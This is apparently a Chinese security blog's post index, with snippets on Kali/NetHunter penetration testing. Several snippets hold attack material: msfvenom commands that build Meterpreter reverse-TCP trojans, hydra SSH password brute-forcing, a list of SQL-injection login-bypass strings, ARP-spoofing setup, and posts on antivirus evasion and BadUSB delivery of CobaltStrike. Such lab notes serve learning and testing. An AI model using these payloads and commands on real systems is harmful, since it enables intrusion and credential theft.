- 博客(42)
- 资源 (8)
- 收藏
- 关注
RSS订阅原创 docker命令
3.删除所有docker镜像:docker rmi $(docker images -q)2.删除所有docker容器:docker rm $(docker ps -a -q)4.停止 docker 服务:systemctl stop docker。
2023-04-14 16:09:59
592
原创 php8.1-common : 依赖: libffi6 (>= 3.2) 但无法安装它(树莓派4B kali)
raspberry pi树莓派4B,安装Fluxion安装显示php-cgi异常,修复PHP8未果,考虑兼容问题卸载后重新安装(apt-get --purge remove )还是出现php8.1-common : 依赖: libffi6 (>= 3.2) 但无法安装它。我考虑手动安装一下。
2022-09-05 14:39:43
921
原创 nmap保存到扫描文件(局域网)
rootkali)-[/] nmap 192.168.0.1/24 | grep scan | grep -v addresses |grep -v on | awk '{print $5}' | >test.txt
2022-08-07 18:24:50
910
原创 CobaltStrike图片远程上线(实验篇)
imageURL="http//localhost/shell.jpeg"并保存。复制出payload.java的代码payload1到code.go里。3.图片一张(稍微大一点像素的,我选择是1600X2400)1.windows7旗舰版64位(安装360)2.Go语言环境(配置参考上一篇)
2022-07-30 12:17:09
356
原创 Linux 配置Java环境
包下载好的jdk拖到java文件夹jdk下载地址:链接:https://pan.baidu.com/s/18tMOeOLfP-jSOHOa7ME6xA提取码:pksq
2022-07-30 11:25:31
144
原创 在Windows上安装Go语言开发包
安装Go语言开发包,首先从Windows系统开始。开发包安装完成后,我们还需要配置一下GOPATH环境变量,之后才可以使用Go语言进行开发。GOPATH 是一个路径,用来存放开发中需要用到的代码包。新版本的Go会自己添加,或者自己手动添加。...
2022-07-30 11:04:34
215
原创 Cobaltstrike和BurpSuite桌面快捷配置
安装好Cobaltstrike,burpsuite环境后想便捷启动,如何操作呢?进入vnc桌面,可以双击sh文件进入Burpsuite和Cobaltstrike。Cobaltstrike和BurpSuite桌面快捷配置。Burp.sh(记得+x)内容如下。cs.sh(记得+x)内容如下。Nethunter点击。...
2022-07-23 21:26:50
704
转载 无文件落地免杀的初尝试思考(上)
我们通过BarrettAdams师傅GitHub里面的代码分析,我们发现免杀的本质还是加密与混淆;我们通过底层函数的调用与"位图"的RNG隐藏躲避了def检测,那我们把这个数据流在进行Base64加密后执行呢?我们把这个数字流通过”+“或者函数拼接呢?又或者我们改用其他不那么敏感的函数调用呢?或者用音频或者视频隐写呢?因为笔者也是初次尝试无文件落地免杀,所以难免有一些疏漏。如果存在问题,欢迎大家在评论区指正。作者面包and牛奶,文章转载于FreeBuf.COMhttpshttpshttps。...
2022-07-23 20:03:13
561
转载 完美解决CentOS8 yum安装AppStream报错,更新yum后无法makecache的问题
CentOS 8 yum安装软件时,提示无法从AppStream下载[root@C8-3 ~]# yum -y install httpd mariadb-server mariadb php php-mysqlRepository AppStream is listed more than once in the configurationRepository extras is listed more than once in the configurationRepository PowerT
2022-06-10 21:08:59
353
原创 移动安全必备之CS呢【NETHUNTER】
一个手机+Type-C转接头+鼠标NETHUNTER上运行cs,上线后更方便后渗透测试。Cobaltstrike图形化界面操作更简洁,做安全渗透的必备。
2022-06-08 11:10:33
148
原创 WindowsX64下pyinstaller打包code
工具: PyInstaller: 5.1平台:Windows7 X64Python文件(比如ByyouPass加载器)UPX未安装正确会出现:下载upx,我选择的是:upx-3.96-win64.zip,解压出来复制upx.exe到pyinstaller所在文件夹。
2022-06-04 11:28:48
475
原创 安全攻防之BadUsb攻击之CS上线
一、环境和准备1.win7 X64系统2.arduino Leonardo板子一块3.cs4.4服务器(Linux已经启动CS并配置好监听器,本文不做讨论,感兴趣的自行百度)win7安装好Leonardo板子驱动,后显示结果如下Com3端口,烧录时候会用到;HID编译工具,arduino-1.5.5-r2,二、编译和上传代码到Leonardo板子 将Leonardo板子插入电脑,安装完驱动后选择好对应的板子和对应的Com口,如下...
2022-05-28 15:40:46
1707
原创 ProxyPool 爬虫代理IP池(分享)
GitHub - jhao104/proxy_pool: Python爬虫代理IP池(proxy pool)https://github.com/jhao104/proxy_pool/ProxyPool 爬虫代理IP池项目,主要功能为定时采集网上发布的免费代理验证入库,定时验证入库的代理保证代理的可用性,提供API和CLI两种使用方式。同时你也可以扩展代理源以增加代理池IP的质量和数量。一、下载代码:git clonegit clone [email protected]:jhao104/prox
2022-04-07 15:15:02
4747
原创 中国蚁剑下载AntSword
我们下载的时候需要下载两个部分,一个是项目核心源码”antSword“,另一个是加载器;加载器则分为三个版本:Mac、Windows、Linux。器GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器AntSword 加载器. Contribute to AntSwordProject/AntSword-Loader development by creating an account on GitHub.https://github.com/An..
2022-04-05 17:31:09
5468
原创 手机空间清理
apt-get autocleancd /var/cache/apt/archivesrm -rf ./*log下文件,删掉无用的安装包等工作后发现手机空间还是不够。find / -xdev -size +100M -exec ls -l {} \;可以查询大于100M的大文件,然后可以从返回值里面找到大文件所在目录,发现msf一个log超大。直接干掉他。27G空间出来了,之前做pentest一直挂着,就几个小时功夫;建议大家设置msf的log参...
2022-03-13 23:03:42
432
原创 Metasploit载荷生成器使用[Nethunter]
环境 Window7 64位 安卓手机(Nethunter) Payload生成器设置好端口7100,Windows平台后生成脚本到SDCARDcd /sdcard/; msfpc windows 192.168.2.51 7100 msf reverse staged tcp┌──(rootcd /sdcard/; msfpc tage...
2022-03-13 11:26:34
303
原创 msfconsole常用搜索命令search
msfconsole启动msf控制台后└─msfconsole 2 ⨯ . .. dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o ' dB' BBP dB'dB'dB' d...
2022-02-18 21:27:24
8888
原创 ssh更改端口后如何用hydra破解密码【nethunter】
用户为root,密码sdcard卡下passdic.txt,没有改端口直接用ssh协议,线程推荐为T=4,这里选择6hydra -l root -P /sdcard/passdic.txt -v -e ns -t 6192.168.0.1 ssh变更端口后,用-s 指定端口:2222hydra -l root -P /sdcard/passdic.txt -v -e ns -t 8 -s 2222 ssh://192.168.0.30Mysql hydra使用参考如下...
2022-02-18 15:21:57
11617
原创 xerosploit nethunter安装
github的网速有点慢,2022-2-5亲测xerosploit的地址可用git clone https://github.com/shivanshjoshi28/xerosploit运行出错需下载 terminaltablesgit clonecd terminaltablespython setup.py install
2022-02-05 12:49:31
704
原创 Wapiti 轻量级网页安全漏洞扫描工具
wapiti -hules] [–update] [-l LEVEL][-p PROXY_URL] [–tor] [-a CREDENTIALS][–auth-type {basic,digest,kerberos,ntlm,post}][-c COOKIE_FILE] [–skip-crawl] [–resume-crawl][–flush-attacks] [–flush-session] [–store-session PATH][–store-config PATH] [-s URL]
2022-02-03 23:29:02
650
原创 whatweb指纹分析 tools1
wifite┌──(root????kali)-[/] └─# wifite. ..´ · . . · . wifite2 2.5.8 : : : (¯) : : : a wireless auditor by derv82. · /¯\ ´ · .´ maintained by kimocoder /¯¯¯\ ´ h
2022-02-03 23:13:50
660
原创 Wafw00f 防火墙检测 tools2
安防工作-[/]┌──(root????kali)-[/]└─# wafw00f -hUsage: wafw00f url1 [url2 [url3 … ]]example: wafw00f http://www.victim.org/Options:-h, --help show this help
2022-02-03 22:48:56
3045
原创 nethunter自带 kali-tools-web更新
!](https://img-blog.csdnimg.cn/b1994459bedfd0Hit:1 http://mirrors.neusoft.edu.cn/kali kali-rolling在这里插入图片描述graph TD;A-->B;B-->C;: 安卓手机:oppo R17.无线网络环境2(外网180.80.xx.xx,内网:192.168.1.XX): 思路:制作payload,攻击,映射端口二、准备:一个ngrok帐号。 2.1没有可以去注册:htt...
2020-04-11 21:12:29
466
转载 Metasploit实验:制作免杀payload+对任意“外网”主机的远控
*本文只做技术交流之用,技术无罪,希望大家知法懂法,更要守法我发一个文件,你电脑就被我控制了,我可以拍照摄像下载文件,杀毒软件也不管用!这是怎么做到的呢?这个问题的实现需要拆分成下面三个模块内网穿透到外网制作免杀木马后门Metasploit控制客户机环境准备操作系统 用途 IP地址 需要软件 Kali 制作payload,攻击,映射端口...
2020-04-09 21:13:14
3335
1
原创 METASPLOIT配置使用小技巧
msf5 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=6666 -f exe > /root/setup.exe[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=6666 -f...
2020-03-28 20:43:05
197
转载 使用msfvenom生成木马
使用msfvenom生成木马Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindows msfvenom -p windows/meter...
2020-03-28 17:36:30
628
原创 Kali-Linux更换国内源
.打开终端在终端输入root@kali:~# vim /etc/apt/sources.list将下面内容放进去(更新源不适合放太多,挑一两个源就行了)# For information about how to configure apt package sources,# see the sources.list(5) manual.#deb http://http.kali...
2020-03-24 17:38:21
1668
原创 kali中间人攻击之arp欺骗(获取图片和表单数据)
2020新版kali默认安装没有arpspoof和driftnet,终端下输入:apt-get install dsniff ,和 apt-get installdriftnet介绍:arpspoof是dsniff集成的一个工具,当前是V2.4版本。配置环境:root@kali3:~# echo 1 > /proc/sys/net/ipv4/ip_forward开始欺骗和...
2020-03-15 22:55:44
2278
1
原创 pikachu靶场 字符型注入(sqlmap注入参数,针对GET方法)
pikachu靶场 字符型注入可以用BurpSuit进行操作,可以获取到所有用户,但是要获取数据库的表内容我们还是用SQLMAP进行。SqlMap注入中,上次是采用POST表单的注入,这次我们讲解GET方法取表的内容。参数返回:GET /pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2 HTTP/1...
2020-03-02 14:37:49
2379
原创 sqlmap注入参数(常用)pikachu靶场
对于有SQL注入的参数,可以采用SQLMap进行批量测试,常用命令如下:使用sqlmap跑post方式时的格式:python2 sqlmap.py -u "<url>" --data="<post提交的参数>" -<参数> 使用sqlmap跑数据库 pythonsqlmap.py -u "http://test.com/pikachu-m...
2020-03-02 13:03:03
1690
1
原创 sql注入万能密码 admin 'or '1'='1'# (# 为注释后面内容)
admin 'or '1'='1'# (# 为注释后面内容)admin'--admin'or4=4--admin'or'1'='1'--admin888"or"a"="aadmin'or2=2#a'having1=1#a'having1=1--admin'or'2'='2')or('a'='aor4=4--ca'or'4=4--"or...
2020-03-01 22:22:00
10097
1
转载 pikachu-数字型注入-(方法二)之BurpSute (pikachu数字型注入)
pikachu-数字型注入-(方法一)之sqlmap (pikachu数字型注入) 另附pikachu-数字型注入-(方法二)之BurpSute (pikachu数字型注入)今天猴子君要和大家探讨的是SQL注入部分的数字型的注入过程。首先运行pikachu的测试环境,找到SQL-Inject章节的数字型注入(post)。先进行第一次试探,查看一下运行的原理。发现这是一个基于...
2020-03-01 21:02:15
547
转载 pikachu-数字型注入-方法一之:sqlmap (pikachu数字型注入)
pikachu-数字型注入-(方法一)之sqlmap (pikachu数字型注入)pikachu-数字型注入-(方法二)之BurpSute (pikachu数字型注入)另附题目链接:http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php题目来源:pikachu-->SQL-inject-->数字型注入(post)任意...
2020-03-01 20:50:46
2671
充分利用路测分析提高网络性能
2009-08-24
WCDMA内部培训资料
2009-05-15
C#用GDI+画图经典案例(不下后悔)
2008-09-15
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人